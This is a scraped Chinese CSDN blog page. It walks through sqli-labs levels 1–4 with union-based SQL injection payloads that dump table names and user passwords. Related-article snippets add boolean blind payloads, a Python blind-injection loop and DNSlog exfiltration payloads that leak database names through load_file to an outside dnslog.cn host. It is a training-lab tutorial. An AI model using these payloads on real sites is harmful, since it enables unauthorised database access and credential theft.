sql-labs 回显注入+盲注+dnslog注入

最新推荐文章于 2024-02-21 21:59:35 发布
最新推荐文章于 2024-02-21 21:59:35 发布
阅读量3.4k 收藏 1
点赞数 1
分类专栏: sql注入 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Khazking/article/details/121543851
版权
本文详细介绍了SQL注入的各种类型,包括回显注入、盲注和DNSlog注入。通过实例展示了如何利用单引号、数字、括号闭合等方法进行回显注入,并通过布尔盲注、报错注入和时间盲注来获取信息。同时,文章还阐述了DNSlog注入的原理、利用场景和实际操作步骤。
摘要由CSDN通过智能技术生成

第一题~第四题:回显注入

1.字符串:单引号'闭合

判断注入类型

id=1

id=1 and 1=2

id=1'

说明为字符型注入  源代码:id='$id' LIMIT 0,1   构造:id='1'' LIMIT 0,1  报错: '1'' LIMIT 0,1'(最外面的'  '是回显时添加的)

id=-1' --+

说明sql为单引号闭合

id=1'   order by 3正常

id=1'  order by 4报错

判断字段数为3

id=-1' union select 1,2,3 判断可利用字段数 

爆库:

id=-1' union select 1,database(),3--+

爆表:

id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

 爆字段名:

id=-1 ' union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'users' --+ 

爆字段值:

id=-1 ' union select 1,group_concat(username),group_concat(password) from users --+ 

2.数字型注入

id=1

id =1 and 1=2

 说明为数字型注入

后面操作同第一题

3.字符串:  '单引号+()括号闭合

id=1

id=1 and 1=2

均正常

id=1'

说明为字符型注入,sql为'单引号+()括号闭合

后续操作如第一题

4.字符串:"双引号+(括号)闭合

id=1"

说明存在字符型注入,sql为"双引号+(括号)闭合

后续操作如第一题

最低0.47元/天 解锁文章
caiji2312
关注
专栏目录
26-4 SQL注入攻击 - 不同数据库系统利用dnslog姿势
weixin_43263566的博客
03-12 130
函数来执行文件读取操作,并通过注入恶意代码来触发 DNS 解析以传输数据到 DNSLog 平台。函数,触发 DNS 解析并将数据传输到 DNSLog 平台,实现数据的传送和记录。函数和恶意注入代码来实现数据传输至 DNSLog 平台,进而利用 DNSLog 来获取数据或执行进一步的操作。先进入mysql的命令行:其他菜单选项 --> MySQL工具 --> MySQL命令行。这段代码是在 MySQL 数据库执行的恶意注入操作,旨在通过。通过这种方式,攻击者可以利用恶意注入操作来利用数据库管理系统的。
Sql注入基础复习
qq_49283465的博客
10-14 362
注入类型为’时,所构造的sql语句为’2’ and ‘1’=‘1’,返回的值为’2’,所以所查询的结果为id=2。注入类型为’)时,所构造的sql语句为(‘2’ and ‘1’=‘1’),这时会把括号内的值当做布尔值处理。2’ and ‘1’=‘1,若返回结果为id=2时的值,则说明注入类型为’,若返回结果为id=1时的值,说明注入类型为’)闭合方式’ " () (‘x’) ((‘x’)) (“x”) ((“x”)) (()) ‘%x%’-------
sqli-labs 盲注命令
LztCode
10-16 290
sql盲注 sqli-less8布尔注入,跟dvwa差不多,下面列出猜解代码 查版本。?id=1’and left(version(),1)=5–+ 查库名。?id=1’and ascii(substr(database(),1,1))=115–+ 查表数。?id=1’and (select count(table_name)from information_schema.tables where table_schema=‘security’)=4–+ 查表长。?id=1’and length(subst
sql-labs Less8 盲注
为之的博客
06-24 412
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import requests #数据库长度 import time url = "http://localhost/sqli-labs-master/Less-8" # 0' or length(database())=8 --+ len = -1 for i in range(1,100): param = "0' or length(database())=" + str(i) + "#" .
SQL注入漏洞-利用DNS进行盲注
HacHunter的博客
03-23 536
在windows下面,可以通过网络路径(NUC)来访问其他主机的资源。其格式如下: \\servername\sharename,其servername是服务器名。sharename是共享资源的名称。 其servername可以是主机IP或者域名 当servername是域名的时候,会通过DNS 把域名把dns解析为IP地址。 DNS 服务器:win2003,IP:10.1.1.31添加一条主机记录baidu.com 10.1.1.31 子域名test 委托到10.1.1.251 We..
(16)【SQL盲注】基础函数、报错回显、延时判断、逻辑判断盲注
02-25 2089
适合新手看的盲注
sqli-labs Less5~6 布尔盲注(有报错回显)
双子叶mm的博客
10-22 253
双查询注入原理 这里参考了这篇文章: https://blog.csdn.net/Leep0rt/article/details/78556440 需要理解四个函数/语句: 1. rand() //随机函数 2. floor() //取整函数 3. count() //汇总函数 4. group by clause //分组语句 Rand()函数作用如下: 返回[0,1)之间的随机数,用法就是SELECT rand(); Floor()函数作用如下: 向下取整,用法即SELECT floor(11.
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 3134
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
第17天:WEB漏洞-SQL注入之二次,加解密,DNS注入1
08-03
**DNSlog注入**主要针对无法直接回显数据的**盲注**情况,即攻击者无法直接从响应获取数据库信息。攻击者通过将恶意SQL查询的结果重定向到DNS记录,然后监控DNS解析日志来获取数据。这提高了攻击的效率,因为即使...
WEB漏洞-SQL注入之报错盲注
ran的博客
01-16 688
内容包括导图、引论,SQL盲注的方法:报错盲注(insert报错盲注、update报错盲注、delete报错盲注)、时间盲注、布尔盲注,从基础内容开始,与实例结合,由浅到深的介绍了各种盲注方法的原理以及盲注过程,用到的实例包括pikachu、SQLi-LABS等,同时介绍了常用的SQL语句的用法,对盲注过程用到的各种函数也进行了简单明了的介绍。
SQL注入DNSLog外带注入
最新发布
dragon的博客
02-21 2919
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog外带注入也可以使用BurpSuite同样可以实现相应功能。
封神台sql靶场 dns_log 注入
weixin_46578840的博客
06-25 260
前提:目标数据库允许load_file() 1 and 1=1 //正常 1 and 1=2 //页面错误,存在注入 1 and 1=2 union select 1,2 # //回显位为2,由于题目要求用dnslog,那就用联合查询了 构造poyload 1 and (select load_file('//',(concat(select database()),'.xizusd.dnslog.cn/abc'))) 1+and+(select+load_file(concat('//',(select+
dnslog带出——sqli-labs第8关
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-04 1821
得到一个随机的子域名 库名 http://172.16.11.54/sqli-labs/Less-8/?id=1' and load_file(concat("\\\\",database(),".uifm3e.dnslog.cn\\xxx.txt"))--+ 表名 http://172.16.11.54/sqli-labs/Less-8/?id=1' and load_file(concat("\\\\",(select group_concat(table_name SEPARATOR'-') f.
sql注入-06二次注入、加解密、DNS注入
weixin_44576725的博客
11-15 1017
二次注入、加解密、DNS注入 1、二次注入 二次注入可以理解为,攻击者构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库,当Web程序调用存储在数据库的恶意数据并执行SQL查询时,就发生了SQL二次注入。 二次注入,可以概括为以下两步: 第一步:插入恶意数据 进行数据库插入数据时,对其的特殊字符进行了转义处理,在写入数据库的时候又保留了原来的数据。
SQL注入学习——Bool盲注详解 sqli-labs(Less 8)
未完成的歌~的博客
07-29 6641
Less-7导出文件GET字符型注 打开页面输入?id=1 试了很多发现报错信息都一样,查看下源代码: if($row) { echo '<font color= "#FFFF00">'; echo 'You are in.... Use outfile......'; echo "<br>"; echo "</font>"; ......
SQL注入2——盲注(重学)
qq_52263650的博客
11-07 4000
SQL注入2——布尔型盲注(重学)
SQL注入之利用DNS获取数据
Au
03-13 4039
1.SQL注入 SQL注入一般分为报错注入盲注盲注的又分为布尔盲注和时间盲注。 当我们发现一个站点存在一个没有数据回显注入点进行注入时,只能采取盲注,这种注入速度非常慢,需要一个一个字符猜解,而且很容易搞挂网站,这时候我们就需要寻找一种快速有效的方法来获取数据。 此时我们就可以利用DNS来快速的获取数据,当然我们也可以在无回显的命令执行或者无回显的SSRF利用 特点:...
DVWA-SQL回显注入模块 包括代码审计
weixin_45715461的博客
06-01 568
DVWA-SQL回显注入模块 包括代码审计
sqlmap)【sqli-labs8-10】盲注:布尔盲注、时间盲注
07-06 3700
sqlmap-跑盲注靶场】
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值